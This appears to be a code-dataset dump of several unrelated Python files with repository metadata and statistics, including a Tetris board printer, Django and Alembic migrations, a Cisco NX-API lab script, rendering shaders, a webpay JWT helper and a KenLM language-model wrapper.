] | null | null | null | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
] | null | null | null | from numba import njit
@njit
def print_board_to_string(state):
string = "\n"
for row_ix in range(state.representation.shape[0]):
# Start from top
row_ix = state.num_rows - row_ix - 1
string += "|"
for col_ix in range(state.num_columns):
if state.representation[row_ix, col_ix]:
string += "██"
else:
string += " "
string += "|\n"
return string
@njit
def print_tetromino(tetromino_index):
if tetromino_index == 0:
string = '''
██ ██ ██ ██'''
elif tetromino_index == 1:
string = '''
██ ██
██ ██'''
elif tetromino_index == 2:
string = '''
██ ██
██ ██'''
elif tetromino_index == 3:
string ='''
██ ██
██ ██'''
elif tetromino_index == 4:
string ='''
██
██ ██ ██'''
elif tetromino_index == 5:
string ='''
██ ██ ██
██'''
elif tetromino_index == 6:
string="""
██ ██ ██
██"""
return string
| 19.588235 | 55 | 0.473473 | 128 | 999 | 3.992188 | 0.296875 | 0.164384 | 0.164384 | 0.164384 | 0.403131 | 0.375734 | 0.375734 | 0.375734 | 0 | 0 | 0 | 0.013761 | 0.345345 | 999 | 50 | 56 | 19.98 | 0.678899 | 0.014014 | 0 | 0.409091 | 0 | 0 | 0.114053 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.022727 | 0 | 0.113636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04f33a4db6a3d77dadc337f038d05a2584b99585 | 817 | py | Python | main/migrations/0017_auto_20200608_1908.py | eugenek45/project-review | 7fadba65968f5c4f0d4e9c75aaadb63a3c918a2b | [
"MIT",
"Unlicense"
] | null | null | null | main/migrations/0017_auto_20200608_1908.py | eugenek45/project-review | 7fadba65968f5c4f0d4e9c75aaadb63a3c918a2b | [
"MIT",
"Unlicense"
] | 7 | 2021-03-30T14:10:00.000Z | 2022-01-13T03:04:50.000Z | main/migrations/0017_auto_20200608_1908.py | NgugiMuthoni/django3 | 81569804f3f008f7a0430ecf00186e7097aca64c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2020-06-08 16:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.utils.timezone
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('main', '0016_auto_20200608_1635'),
]
operations = [
migrations.AlterField(
model_name='project',
name='image',
field=models.ImageField(default=django.utils.timezone.now, upload_to=''),
preserve_default=False,
),
migrations.AlterField(
model_name='project',
name='reviewDate',
field=models.DateTimeField(default=datetime.datetime(2020, 6, 8, 16, 8, 21, 921926, tzinfo=utc)),
),
]
| 27.233333 | 109 | 0.632803 | 90 | 817 | 5.611111 | 0.588889 | 0.065347 | 0.112871 | 0.114851 | 0.158416 | 0.158416 | 0 | 0 | 0 | 0 | 0 | 0.080196 | 0.252142 | 817 | 29 | 110 | 28.172414 | 0.746318 | 0.080783 | 0 | 0.272727 | 1 | 0 | 0.074866 | 0.030749 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.227273 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04fde6a91399f1b1649e35274fd649d62fdf4bc6 | 846 | py | Python | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | null | null | null | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | null | null | null | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | 1 | 2018-05-02T15:03:06.000Z | 2018-05-02T15:03:06.000Z | # -*- coding: utf-8 -*-
"""Setup the flatpages application"""
from __future__ import print_function
from flatpages import model
from tgext.pluggable import app_model
import logging
log = logging.getLogger(__name__)
def bootstrap(command, conf, vars):
log.info('Bootstrapping flatpages...')
# creating a new permission and assign it to managers group
p = app_model.Permission(permission_name='flatpages', description='Can manage flat pages')
try: # sqlalchemy
g = model.DBSession.query(app_model.Group).filter_by(group_name='managers').first()
except: # ming
g = app_model.Group.query.find(dict(group_name='managers')).first()
if g:
p.groups = [g]
try:
model.DBSession.add(p)
except AttributeError:
pass # ming doesn't need to add
model.DBSession.flush()
| 26.4375 | 94 | 0.685579 | 109 | 846 | 5.165138 | 0.587156 | 0.056838 | 0.046181 | 0.078153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001481 | 0.202128 | 846 | 31 | 95 | 27.290323 | 0.832593 | 0.180851 | 0 | 0.105263 | 0 | 0 | 0.105417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.052632 | 0.210526 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ca014c25d096d91028ea9e83c7bd4dbddd8eb75a | 474 | py | Python | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | null | null | null | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | 1 | 2020-11-04T18:29:10.000Z | 2020-11-04T18:32:44.000Z | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-12-06 21:06
import blog.validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_remove_chatroom_allow_any'),
]
operations = [
migrations.AlterField(
model_name='chatroom',
name='room_logo',
field=models.ImageField(upload_to='room_pics', validators=[blog.validator.validate_file_size]),
),
]
| 23.7 | 107 | 0.647679 | 54 | 474 | 5.5 | 0.740741 | 0.087542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052778 | 0.240506 | 474 | 19 | 108 | 24.947368 | 0.772222 | 0.094937 | 0 | 0 | 1 | 0 | 0.140515 | 0.070258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b8e6f29824ae76e1a3ea0be36034c5b768f6ae | 2,058 | py | Python | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | 1 | 2019-04-17T02:49:58.000Z | 2019-04-17T02:49:58.000Z | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | null | null | null | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | null | null | null | from getpass import getpass
from nxapi_plumbing import Device
from lxml import etree
from pprint import pprint as pp
# Disable Self-signed Certificate Warnings
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
'''
7. NX-API using XML and the nxapi_plumbing library
7a. Create an nxapi_plumbing "Device" object for nxos1. The api_format should be
"xml" and the transport should be "https" (port 8443). Use getpass() to capture
the device's password. Send the "show interface Ethernet2/1" command to the device,
parse the output, and print out the following information:
Interface: Ethernet2/1; State: up; MTU: 1500
7b. Run the following two show commands on the nxos1 device using a single method
and passing in a list of commands: "show system uptime" and "show system resources".
Print the XML output from these two commands.
7c. Using the nxapi_plumbing config_list() method, configure two loopbacks on
nxos1 including interface descriptions. Pick random loopback interface numbers
between 100 and 199.
'''
device = Device(
api_format="xml",
host="nxos1.lasthop.io",
username="pyclass",
password=getpass(),
transport="https",
port=8443,
verify=False,
)
intf_output = device.show("show interface Ethernet2/1")
print('7a')
print(f'Interface: {intf_output.find(".//interface").text}')
print(f'State: {intf_output.find(".//state").text}')
print(f'MTU: {intf_output.find(".//eth_mtu").text}')
print('7b')
show_output = device.show_list(["show system uptime", "show system resources"])
for output in show_output:
print(etree.tostring(output, encoding="unicode"))
commands = [
"interface loopback151",
"description loopback151",
"no shutdown",
"interface loopback152",
"description loopback152",
"no shutdown",
]
print('7c')
output = device.config_list(commands)
# Look at the output XML for each configuration command
for msg in output:
print(etree.tostring(msg, encoding="unicode"))
| 30.716418 | 84 | 0.751701 | 285 | 2,058 | 5.368421 | 0.410526 | 0.033987 | 0.037255 | 0.030065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027857 | 0.145287 | 2,058 | 66 | 85 | 31.181818 | 0.841956 | 0.045675 | 0 | 0.054054 | 0 | 0 | 0.31115 | 0.095938 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.054054 | 0.162162 | 0 | 0.162162 | 0.243243 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b90e06479763706578fab36f6a27abef53dde3 | 607 | py | Python | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | """empty message
Revision ID: dd503a5987b5
Revises: b4722c8968df
Create Date: 2016-08-30 16:48:54.954000
"""
# revision identifiers, used by Alembic.
revision = 'dd503a5987b5'
down_revision = 'b4722c8968df'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('name', sa.String(length=64), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'name')
### end Alembic commands ###
| 22.481481 | 82 | 0.691928 | 76 | 607 | 5.486842 | 0.605263 | 0.064748 | 0.100719 | 0.110312 | 0.211031 | 0.211031 | 0.211031 | 0.211031 | 0 | 0 | 0 | 0.107356 | 0.171334 | 607 | 26 | 83 | 23.346154 | 0.72167 | 0.479407 | 0 | 0 | 0 | 0 | 0.14841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b9e50dcc239d248e5f15f0184951362519c58c | 7,604 | py | Python | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | from __future__ import print_function, division, absolute_import
from six.moves import reduce
import numpy as np
import math
import abstract_rendering.core as core
import abstract_rendering.util as util
# ----------- Aggregators -----------
class Count(core.GlyphAggregator):
"""Count the number of items that fall into a particular grid element."""
out_type = np.int32
identity = 0
def allocate(self, glyphset, screen):
(width, height) = screen
return np.zeros((height, width), dtype=self.out_type)
def combine(self, existing, glyph, shapecode, val):
update = self.glyphAggregates(glyph, shapecode, 1, self.identity)
existing[glyph[1]:glyph[3], glyph[0]:glyph[2]] += update
def rollup(self, *vals):
return reduce(lambda x, y: x+y, vals)
class Sum(core.GlyphAggregator):
"""Count the number of items that fall into a particular grid element."""
out_type = np.int32
identity = 0
def allocate(self, glyphset, screen):
(width, height) = screen
return np.zeros((height, width), dtype=self.out_type)
def combine(self, existing, glyph, shapecode, val):
update = self.glyphAggregates(glyph, shapecode, val, self.identity)
existing[glyph[1]:glyph[3], glyph[0]:glyph[2]] += update
def rollup(self, *vals):
return reduce(lambda x, y: x+y, vals)
# -------------- Shaders -----------------
class Floor(core.CellShader):
def shade(self, grid):
return np.floor(grid)
class Interpolate(core.CellShader):
"""Interpolate between two numbers.
Projects the input values between the low and high values passed.
The Default is 0 to 1.
Empty values are preserved (default is np.nan).
"""
def __init__(self, low=0, high=1, empty=np.nan):
self.low = low
self.high = high
self.empty = empty
def shade(self, grid):
# TODO: Gracefully handle if the whole grid is empty
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
span = float(max-min)
percents = (grid-min)/span
return self.low + (percents * (self.high-self.low))
class Power(core.CellShader):
"""Raise to a power. Power may be fracional."""
def __init__(self, pow):
self.pow = pow
def shade(self, grid):
return np.power(grid, self.pow)
class Cuberoot(Power):
def __init__(self):
super(Cuberoot, self).__init__(1/3.0)
class Sqrt(core.CellShader):
def shade(self, grid):
return np.sqrt(grid)
class Spread(core.SequentialShader):
"""
Spreads the values out in a regular pattern.
* factor : How far in each direction to spread
TODO: Currently only does square spread. Extend to other shapes.
TODO: Restricted to numbers right now...implement corresponding thing
for categories...might be 'generic'
"""
def __init__(self, up=1, down=1, left=1, right=1, factor=np.NaN):
if np.isnan(factor):
self.up = up
self.down = down
self.left = left
self.right = right
else:
self.up = factor
self.down = factor
self.left = factor
self.right = factor
def makegrid(self, grid):
height = grid.shape[0]
width = grid.shape[1]
others = grid.shape[2:]
height = height + self.up + self.down
width = width + self.left + self.right
return np.zeros((height, width) + others, dtype=grid.dtype)
def cellfunc(self, grid, x, y):
(height, width) = grid.shape
minx = max(0, x-self.left-self.right)
maxx = min(x+1, width)
miny = max(0, y-self.up-self.down)
maxy = min(y+1, height)
parts = grid[miny:maxy, minx:maxx]
return parts.sum()
class BinarySegment(core.CellShader):
"""
Paint all pixels with aggregate value above divider one color
and below the divider another. Divider is part of the 'high' region.
TODO: Extend so out can be something other than colors
"""
in_type = (1, np.number)
out_type = (4, np.int32)
def __init__(self, low, high, divider):
self.high = high
self.low = low
self.divider = float(divider)
def shade(self, grid):
(width, height) = grid.shape[0], grid.shape[1]
outgrid = np.ndarray((width, height, 4), dtype=np.uint8)
mask = (grid >= self.divider)
outgrid[mask] = self.high
outgrid[~mask] = self.low
return outgrid
class InterpolateColors(core.CellShader):
"""
High-definition interpolation between two colors.
Zero-values are treated separately from other values.
TODO: Remove log, just provide a shader to pre-transform the values
TODO: Can this be combined with 'Interpolate'? Detect type at construction
* low -- Color ot use for lowest value
* high -- Color to use for highest values
* log -- Set to desired log base to use log-based interpolation
(use True or "e" for base-e; default is False)
* reserve -- color to use for empty cells
"""
in_type = (1, np.number)
out_type = (4, np.int32)
def __init__(self,
low, high,
log=False,
reserve=util.Color(255, 255, 255, 255),
empty=np.nan):
self.low = low
self.high = high
self.reserve = reserve
self.log = log
self.empty = empty
# TODO: there are issues with zeros here....
def _log(self, grid):
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
grid[mask] = 1
if (self.log == 10):
min = math.log10(min)
max = math.log10(max)
span = float(max-min)
percents = (np.log10(grid)-min)/span
elif (self.log == math.e or self.log):
min = math.log(min)
max = math.log(max)
span = float(max-min)
percents = (np.log(grid)-min)/span
elif (self.log == 2):
min = math.log(min, self.log)
max = math.log(max, self.log)
span = float(max-min)
percents = (np.log2(grid)-min)/span
else:
rebase = math.log(self.log)
min = math.log(min, self.log)
max = math.log(max, self.log)
span = float(max-min)
percents = ((np.log(grid)/rebase)-min)/span
grid[mask] = 0
colorspan = (np.array(self.high, dtype=np.uint8)
- np.array(self.low, dtype=np.uint8))
outgrid = (percents[:, :, np.newaxis]
* colorspan[np.newaxis, np.newaxis, :]
+ np.array(self.low, dtype=np.uint8)).astype(np.uint8)
outgrid[mask] = self.reserve
return outgrid
def _linear(self, grid):
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
span = float(max-min)
percents = (grid-min)/span
colorspan = (np.array(self.high, dtype=np.int32)
- np.array(self.low, dtype=np.int32))
outgrid = (percents[:, :, np.newaxis]
* colorspan[np.newaxis, np.newaxis, :]
+ np.array(self.low, dtype=np.uint8)).astype(np.uint8)
outgrid[mask] = self.reserve
return outgrid
def shade(self, grid):
if (self.log):
return self._log(grid)
else:
return self._linear(grid)
| 30.785425 | 78 | 0.577065 | 987 | 7,604 | 4.397163 | 0.221885 | 0.020968 | 0.01659 | 0.02212 | 0.426498 | 0.420968 | 0.395161 | 0.367742 | 0.341244 | 0.341244 | 0 | 0.014791 | 0.297607 | 7,604 | 246 | 79 | 30.910569 | 0.797791 | 0.194108 | 0 | 0.44375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028455 | 0 | 1 | 0.1375 | false | 0 | 0.0375 | 0.03125 | 0.38125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6bac8756d9b92c61f392defe060acf7353cfe9f | 1,374 | py | Python | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | import hashlib
import uuid
from django.conf import settings
import commonware.log
from moz_inapp_pay.verify import verify_claims, verify_keys
import jwt
log = commonware.log.getLogger('z.crypto')
secret = settings.APP_PURCHASE_SECRET
class InvalidSender(Exception):
pass
def get_uuid():
return 'webpay:%s' % hashlib.md5(str(uuid.uuid4())).hexdigest()
def verify_webpay_jwt(signed_jwt):
# This can probably be deleted depending upon solitude.
try:
jwt.decode(signed_jwt.encode('ascii'), secret)
except Exception, e:
log.error('Error decoding webpay jwt: %s' % e, exc_info=True)
return {'valid': False}
return {'valid': True}
def sign_webpay_jwt(data):
return jwt.encode(data, secret)
def parse_from_webpay(signed_jwt, ip):
try:
data = jwt.decode(signed_jwt.encode('ascii'), secret)
except Exception, e:
log.info('Received invalid webpay postback from IP %s: %s' %
(ip or '(unknown)', e), exc_info=True)
raise InvalidSender()
verify_claims(data)
iss, aud, product_data, trans_id = verify_keys(
data,
('iss', 'aud', 'request.productData', 'response.transactionID'))
log.info('Received webpay postback JWT: iss:%s aud:%s '
'trans_id:%s product_data:%s'
% (iss, aud, trans_id, product_data))
return data
| 25.444444 | 72 | 0.664483 | 183 | 1,374 | 4.84153 | 0.415301 | 0.040632 | 0.03386 | 0.040632 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0 | 0.001859 | 0.216885 | 1,374 | 53 | 73 | 25.924528 | 0.821561 | 0.038574 | 0 | 0.111111 | 0 | 0 | 0.181956 | 0.016679 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.027778 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6bfdebde7d1a6fa2a649af7388ae0caea348982 | 5,944 | py | Python | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 22 | 2017-09-29T09:43:59.000Z | 2021-03-31T03:57:52.000Z | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 3 | 2018-04-15T12:57:18.000Z | 2020-02-25T12:43:21.000Z | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 13 | 2017-07-18T03:45:52.000Z | 2019-10-09T05:16:02.000Z | import kenlm
import os
import pickle
import tempfile
import zipfile
from config import KENLM_PATH
from pyro_utils import BGProc
from config import PORT_NUMBER, TEMP_DIR
import time
import subprocess
import shlex
def _unzip_to_tempdir(model_zip_path):
# temp folder (automatically deleted on exit)
tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
# unzip model into tempdir
with zipfile.ZipFile(model_zip_path, 'r', allowZip64=True) as zip_ref:
zip_ref.extractall(tmpdir)
return tmpdir
def _zip_to_model(tmpdir, model_zip_path):
# make pickle file with model options
# create zipfile archive
zf = zipfile.ZipFile(model_zip_path, 'w', allowZip64=True)
zf.compress_type = zipfile.ZIP_DEFLATED # saw a note that this helps with backwards compat
# Adding files from directory 'files'
for _, _, files in os.walk(tmpdir):
for f in files:
zf.write(os.path.join(tmpdir, f), f)
class AbstractLM(object):
def train(self, path_to_text):
raise NotImplementedError()
def save(self, model_file_name):
raise NotImplementedError()
def load(self, model_file_name):
raise NotImplementedError()
def score(self, sentences):
raise NotImplementedError()
def _assert_initilized(self):
if not hasattr(self, 'tmpdir'):
raise Exception('Did you forget to run train or load first?')
class DummyLM(AbstractLM):
def train(self, path_to_text):
pass
def save(self, model_file_name):
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
params = dict(model_type='dummy')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
pass
def score(self, sentences):
return [-42.0 for _ in sentences]
class KenLM(AbstractLM):
"""
implements simple wrapper around kenlm
model is saved as kenlm_model.binary in zip file
model_type is "kenlm"
"""
def wrap_existing_kenlm_model(self, kenlm_model):
if not (kenlm_model.endswith('.binary') or '.binlm' in kenlm_model):
raise Exception('expected file with .binlm* or .binary extension')
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
subprocess.check_call('cp %s %s'%(kenlm_model, model_binary_path), shell=True)
self.kenlm_model = kenlm.Model(model_binary_path)
def train(self, path_to_text):
# also stores binary in temp directory
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_arpa_path = os.path.join(self.tmpdir, 'kenlm_model.arpa')
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
myinput = open(path_to_text)
myoutput = open(model_arpa_path, 'w')
args = shlex.split(os.path.join(KENLM_PATH, 'bin/lmplz') + ' -o 5 -S 40% --skip_symbols </s> <unk>')
# from kenlm exception: --skip_symbols: to avoid this exception:
# Special word </s> is not allowed in the corpus. I plan to support models containing <unk> in the future.
# Pass --skip_symbols to convert these symbols to whitespace.
p = subprocess.Popen(args, stdin=myinput, stdout=myoutput)
p.wait()
#convert arpa to binary
p = subprocess.Popen(shlex.split('%s %s %s' % (os.path.join(KENLM_PATH, 'bin/build_binary'), model_arpa_path, model_binary_path)))
p.wait()
#remove arpa file
p=subprocess.Popen(shlex.split('rm %s' % model_arpa_path))
p.wait()
#lm_bin = os.path.join(KENLM_PATH, 'bin/lmplz')
#binarize_bin = os.path.join(KENLM_PATH, 'bin/build_binary')
#subprocess.check_call('%s -o 5 -S 40%% > %s' % (lm_bin, model_arpa_path))
#subprocess.check_call('%s %s %s' % (binarize_bin, model_arpa_path, model_binary_path))
#subprocess.check_call('rm %s' % model_arpa_path)
self.kenlm_model = kenlm.Model(model_binary_path)
def save(self, model_file_name):
"""
save trained model to disk
TODO (nice to have): write anything that seems useful (training parameters, date trained, etc) to params.pkl
"""
if not model_file_name.endswith('.zip'):
raise Exception('expected output file to have .zip extension')
self._assert_initilized()
params = dict(model_type='kenlm')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
self.tmpdir = _unzip_to_tempdir(model_file_name)
self.kenlm_model = kenlm.Model(os.path.join(self.tmpdir, 'kenlm_model.binary'))
def score(self, sentences):
self._assert_initilized()
return [self.kenlm_model.score(sent, bos=True, eos=True) for sent in sentences]
def lm_factory(model_file_name):
"""
Peek inside model and see which language model class should open it,
and return an instantiation of that class, with said model loaded
:param model_file_name: NematusLL language model file (zip containing params.pkl, etc)
:return: instantiated language model class (implements AbstractLM interface)
"""
print 'creating class map'
class_map = dict(kenlm=KenLM,
dummy=DummyLM)
print 'loading pickle file'
with zipfile.ZipFile(model_file_name, 'r') as zf:
with zf.open('params.pkl') as fh:
params = pickle.load(fh)
print 'setting model type'
model_type = params['model_type']
LM_Class = class_map[model_type]
lm = LM_Class()
print 'loading model file'
lm.load(model_file_name)
return lm
| 33.206704 | 138 | 0.669751 | 818 | 5,944 | 4.676039 | 0.248166 | 0.047059 | 0.047582 | 0.026667 | 0.334379 | 0.286013 | 0.229542 | 0.181699 | 0.126536 | 0.104575 | 0 | 0.002836 | 0.228802 | 5,944 | 178 | 139 | 33.393258 | 0.831588 | 0.1393 | 0 | 0.38 | 0 | 0 | 0.098009 | 0 | 0 | 0 | 0 | 0.005618 | 0.03 | 0 | null | null | 0.02 | 0.11 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6ca139a678c7000c7bdb0593d9843845014384f | 712 | py | Python | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/pythondata-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 3 | 2021-05-12T21:57:55.000Z | 2021-07-29T19:56:04.000Z | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/litex-data-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 2 | 2020-05-13T06:06:49.000Z | 2020-05-15T10:49:11.000Z | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/litex-data-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 2 | 2020-05-01T08:33:19.000Z | 2021-07-29T19:56:12.000Z | import sys
import random
from test_base import *
class TestBlockLD(TestBase):
def generate(self):
self.clear_tag()
for n in range(50000):
store_not_load = random.randint(0,1)
tag = random.randint(0, 15)
index = random.randint(0,self.sets_p-1)
taddr = self.get_addr(tag,index)
if store_not_load:
self.send_block_st(taddr)
else:
self.send_block_ld(taddr)
self.tg.done()
def send_block_st(self, addr):
base_addr = addr - (addr % (self.block_size_in_words_p*4))
for i in range(self.block_size_in_words_p):
self.send_sw(base_addr+(i*4))
# main()
if __name__ == "__main__":
t = TestBlockLD()
t.generate()
| 19.777778 | 62 | 0.636236 | 108 | 712 | 3.888889 | 0.444444 | 0.092857 | 0.1 | 0.071429 | 0.1 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0.026022 | 0.244382 | 712 | 35 | 63 | 20.342857 | 0.754647 | 0.008427 | 0 | 0 | 1 | 0 | 0.011396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
